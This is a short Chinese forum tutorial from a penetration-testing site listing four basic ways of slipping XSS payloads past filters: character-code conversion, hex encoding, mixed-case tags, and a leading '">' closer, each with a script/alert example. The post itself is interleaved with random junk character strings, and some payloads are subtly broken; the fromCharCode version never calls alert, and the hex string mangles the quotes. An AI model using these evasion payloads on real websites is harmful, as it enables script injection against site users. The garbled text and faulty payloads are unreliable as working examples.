中国网络渗透测试联盟

标题: XSS 绕过技术 [打印本页]
作者: admin    时间: 2013-2-14 00:10
标题: XSS 绕过技术
四种超级基础的绕过方法。
; Q( V0 ^3 V& X% @1.转换为ASCII码
! Q' {+ j% i% R7 @! w6 R* \例子:原脚本为<script>alert(‘I love F4ck’)</script >
" j3 j+ S$ x. \' a4 S' l通过转换,变成:' L, S2 ~+ {( a. h7 z1 D
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>- M% m3 Q$ X: U; ?

* K" H9 ?4 Z- H; ~2.转换为HEX(十六进制)
' L( M3 L. j8 h+ Z. p6 `例子:原脚本为<script>alert(‘I love F4ck’)</script>/ ~7 R* Z) d9 c# o+ _, |3 j$ N
通过转换,变成:& P- Z9 ^& C' |5 r$ @: [
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e1 U; z; q# O, u4 e; S- O, o1 D: S

0 Y6 b( t6 F* q' T! v- m) M* w3.转换脚本的大小写
: ~" G. `, @0 w- b- F0 Y- ]( r例子:原脚本为<script>alert(‘I love F4ck’)</script>/ z, g! e7 x7 o! Z
转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>
3 ?- I8 F" {0 D
7 I' ]! m, ~. q4.增加闭合标记”>  f3 C. ~4 F$ L( D5 f8 u
例子:原脚本为<script>alert(‘I love F4ck’)</script>5 V' q7 V8 a; q  J
转换为:”><script>alert(‘I love F4ck’)</script>
  p7 b* Z; M. s. F更详细绕过技术请参考此网页
0 l2 [2 l' X9 g) Xhttps://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
2 K: I; T1 R& }9 d' A2 Q 1 y& U, Y% N$ T6 r
转换工具使用的是火狐的 hackbar mozilla addon.



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2